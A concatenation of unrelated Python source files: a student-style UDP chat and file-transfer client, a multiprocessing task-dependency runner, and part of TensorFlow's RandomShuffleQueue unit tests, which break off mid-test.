unittest.main()
|
client_udp2.py
|
import os
import socket
import threading
from tzlocal import get_localzone
code_table = 'utf-8'
name = input("Username. No more then 16 symbols: ")
if len(name) > 16:
print("No more then 16 symbols, try again")
name = input("Username: ")
hostS = 'networkslab-ivt.ftp.sh'
hostL = '127.0.0.1'
port = 55555
file_end = '37e3f4a8-b8c9-4f22-ad4d-8bd81e686822'
length_of_message = len(f"file{file_end}")
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.connect((hostL, 55555))
lenght = 65535
making_connection = False
def receive_message():
while True:
full_mes = ''.encode(code_table)
message = ''.encode(code_table)
message, address = client.recvfrom(lenght)
full_mes += message
while not file_end.encode(code_table) in full_mes:
message, address = client.recvfrom(lenght)
full_mes += message
else:
print(full_mes[:full_mes.find(file_end.encode(code_table))].decode(code_table))
buffer = 0
def send_message():
global making_connection
while True:
if not making_connection:
client.sendto(bytearray(1), (hostL, port))
print(f'client with name {name} connected ')
making_connection = True
local_tz = get_localzone()
message = input("") + file_end
if message == f"file{file_end}":
file_name = input("Type file name: ")
file_size = os.path.getsize(file_name) + len(file_end.encode(code_table))
client.sendto(f"{message}".encode(code_table), (hostL, port))
file_name_size = f"{file_name}<>{file_size}".encode()
client.sendto(f"{len(file_name_size):<{length_of_message}}".encode(code_table), (hostL, port))
client.sendto(file_name_size, (hostL, port))
f = open(file_name, "rb")
file_data_write = f.read(lenght - len(file_end.encode(code_table)) - 1)
mod_data_to_send = file_data_write + file_end.encode(code_table)
client.sendto(mod_data_to_send, (hostL, port))
f.close()
print(f'File {file_name} was sent')
else:
message_send = f'<{local_tz}>{name}->{message}'.encode(code_table)
message_len_send = f'{len(message_send):<{length_of_message}}'.encode(code_table)
client.sendto(message_len_send + message_send, (hostL, port))
receive_thread = threading.Thread(target=receive_message)
receive_thread.start()
write_thread = threading.Thread(target=send_message)
write_thread.start()
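# Wire-format sketch (derived from the code above, stated here for clarity): a plain
# chat message is one datagram containing a fixed-width length prefix (left-aligned to
# length_of_message characters) followed by '<timezone>name->text' plus the file_end
# sentinel. A file transfer first sends 'file' + sentinel, then the length of
# 'name<>size', then 'name<>size' itself, and finally the file bytes terminated by the
# same sentinel.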
|
tasks.py
|
from ctypes import c_char_p
import logging
import traceback
from multiprocessing import Semaphore, Condition, Lock, Value, Pipe, Process
class Task:
class State:
def __init__(self):
pass
NEW = 'NEW'
RUNNING = 'RUNNING'
DONE = 'DONE'
FAILED = 'FAILED'
def parse_state(self, string):
if string == Task.State.NEW:
return Task.State.NEW
elif string == Task.State.RUNNING:
return Task.State.RUNNING
elif string == Task.State.DONE:
return Task.State.DONE
elif string == Task.State.FAILED:
return Task.State.FAILED
else:
raise AttributeError('Invalid state: %s' % string)
def __init__(self, name):
self.name = name
self.dependencies = set()
self.state = Task.State.NEW
self.result_proxy = None
def __str__(self):
return self.name
def update(self):
if self.result_proxy is not None and self.result_proxy.value != '':
logging.debug("Updating task %s to status %s", self.name, self.result_proxy.value)
self.state = self.parse_state(self.result_proxy.value)
self.result_proxy = None #reset to None to avoid 'RuntimeError: Synchronized objects should only be shared between processes through inheritance'
def has_resolved_dependencies(self):
"""Return True if all dependencies are in State.DONE"""
for dependency in self.dependencies:
if dependency.state != Task.State.DONE:
return False
return True
def is_new(self):
return self.state == Task.State.NEW
def dependencies_as_list(self):
"""Returns a list of dependency names."""
dependencies = []
for dependency in self.dependencies:
dependencies.append(dependency.name)
return dependencies
def dependencies_as_string(self):
"""Returns a comma separated list of dependency names."""
return ",".join(self.dependencies_as_list())
def ordered_dependencies(self):
ordered_dependencies = self._all_dependencies()
return ordered_dependencies
def _all_dependencies(self):
deps = []
unprocessed_deps = [self]
processed_deps = []
while unprocessed_deps:
dep = unprocessed_deps.pop()
if dep.dependencies and dep not in processed_deps and \
not set(dep.dependencies).issubset(set(processed_deps)):
unprocessed_deps += [dep] + list(dep.dependencies)
processed_deps.append(dep)
elif dep not in deps and dep is not self:
deps.append(dep)
return deps
def has_dependencies(self):
return len(self.dependencies) > 0
class Tasks:
def __init__(self):
self.tasks = {}
self.dirty = True
def get_task(self, name):
"""Get task by name or create it if it does not exists."""
if name in self.tasks.keys():
task = self.tasks[name]
else:
task = Task(name)
self.tasks[name] = task
return task
def add(self, task_name, dependency_names=set()):
task = self.get_task(task_name)
for dependency_name in dependency_names:
dependency = self.get_task(dependency_name)
task.dependencies.add(dependency)
self.dirty = True
def get_next(self):
"""Return next task from the stack that has all dependencies resolved.
Return None if there are no tasks with resolved dependencies or is there are no more tasks on stack.
Use `count` to check is there are still some task left on the stack.
raise ValueError if total ordering is not possible."""
self.update_tasks_status()
if self.dirty:
self.tsort()
self.dirty = False
for key, task in self.tasks.iteritems():
if task.is_new() and task.has_resolved_dependencies():
return task
return None
def count(self, state):
self.update_tasks_status()
count = 0
for key, task in self.tasks.iteritems():
if task.state == state:
count += 1
return count
def print_name(self, state):
list = ""
for key, task in self.tasks.iteritems():
if task.state == state:
if list != "":
list += " "+task.name
else:
list = task.name
return list
def update_tasks_status(self):
for key, task in self.tasks.iteritems():
task.update()
def are_dependencies_buildable(self, task):
for dependency in task.dependencies:
if dependency.state == Task.State.FAILED:
return False
else:
if not self.are_dependencies_buildable(dependency):
return False
return True
def count_buildable_tasks(self):
"""Count tasks that are new and have dependencies in non FAILED state."""
self.update_tasks_status()
buildable_tasks_count = 0
for key, task in self.tasks.iteritems():
if task.state == Task.State.NEW:
if self.are_dependencies_buildable(task):
buildable_tasks_count += 1
logging.debug("Buildable task: %s" % task.name )
else:
logging.debug("Task %s has broken dependencies." % task.name )
return buildable_tasks_count
def filter_tasks(self, task_names, keep_dependencies=False):
"""If filter is applied only tasks with given name and its dependencies (if keep_keep_dependencies=True) are kept in the list of tasks."""
new_tasks = {}
for task_name in task_names:
task = self.get_task(task_name)
if task not in new_tasks:
new_tasks[task.name] = task
if keep_dependencies:
for dependency in task.ordered_dependencies():
if dependency not in new_tasks:
new_tasks[dependency.name] = dependency
else:
#strip dependencies
task.dependencies = set()
self.tasks = new_tasks
#todo private
def tsort(self):
"""Given a partial ordering, return a totally ordered list.
parts is a dict of partial orderings. Each value is a set,
which the key depends on.
The return value is a list of sets, each of which has only
dependencies on items in previous entries in the list.
raise ValueError if ordering is not possible (check for circular or missing dependencies)"""
task_dict = {}
for key, task in self.tasks.iteritems():
task_dict[task] = task.dependencies
# parts = parts.copy()
parts = task_dict.copy()
result = []
while True:
level = set([name for name, deps in parts.iteritems() if not deps])
if not level:
break
result.append(level)
parts = dict([(name, deps - level) for name, deps in parts.iteritems() if name not in level])
if parts:
raise ValueError('total ordering not possible (check for circular or missing dependencies)')
return result
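# Worked example (illustrative): for tasks where b depends on a, and c depends on
# both a and b, tsort() returns [{a}, {b}, {c}] -- each set only depends on items in
# earlier sets. If a non-empty `parts` dict remains, there is a circular or missing
# dependency and ValueError is raised.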
def get_all(self):
return self.tasks
class TaskRunner:
"""TaskRunner is used for parallel execution of tasks (replacement for make)"""
def __init__(self, run_build):
self.run_build = run_build
def wait_tasks_to_complete(self, parallel_threads, process_finished_notify, semaphore):
logging.debug("Checking if there are running tasks.")
if semaphore.get_value() < parallel_threads: #is any task running
process_finished_notify.acquire()
logging.debug("Waiting for tasks to complete.")
process_finished_notify.wait()
logging.debug("Finished waiting tasks to complete.")
process_finished_notify.release()
def run(self, tasks, build_config, parallel_threads):
semaphore = Semaphore(parallel_threads)
process_finished_notify = Condition(Lock())
while tasks.count_buildable_tasks() > 0:
task = tasks.get_next()
if task is None:
self.wait_tasks_to_complete(parallel_threads, process_finished_notify, semaphore)
continue
semaphore.acquire()
task.state = Task.State.RUNNING
logging.debug("Starting task %s", task.name)
self.start_new_process(process_finished_notify, semaphore, self.process_job, task, build_config)
self.wait_tasks_to_complete(parallel_threads, process_finished_notify, semaphore)
if tasks.count(Task.State.FAILED) > 0:
logging.error('Some packages failed to build.')
logging.error(" %s", tasks.print_name(Task.State.FAILED))
return 1
if tasks.count(Task.State.RUNNING) > 0:
logging.error('Something went wrong, there are still some running tasks.')
return 1
if tasks.count(Task.State.NEW) > 0:
logging.error('Something went wrong, there are still unprocessed tasks.')
return 1
logging.info("Build completed successfully.")
return 0
def start_new_process(self, process_finished_notify, semaphore, target_method, task, build_config):
result_val = Value(c_char_p, '')
task_conn, task_conn_remote = Pipe()
config_conn, config_conn_remote = Pipe()
p = Process(target=target_method, args=[semaphore, process_finished_notify, task_conn_remote, config_conn_remote, result_val])
p.daemon = True
logging.debug("Sending task: %s", task.name)
task_conn.send(task)
config_conn.send(build_config)
task.result_proxy = result_val
p.start()
def process_job(self, semaphore, process_finished_notify, task_conn, config_conn, result_proxy):
task = task_conn.recv()
build_config = config_conn.recv()
try:
exit_status = self.run_build(task, build_config)
except Exception:
print(traceback.format_exc())
exit_status = 1
if exit_status != 0:
result_proxy.value = Task.State.FAILED
else:
result_proxy.value = Task.State.DONE
process_finished_notify.acquire()
semaphore.release()
process_finished_notify.notify()
process_finished_notify.release()
logging.debug("Task %s finished.", task.name)
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import re
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
def dequeue():
for _ in elems:
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
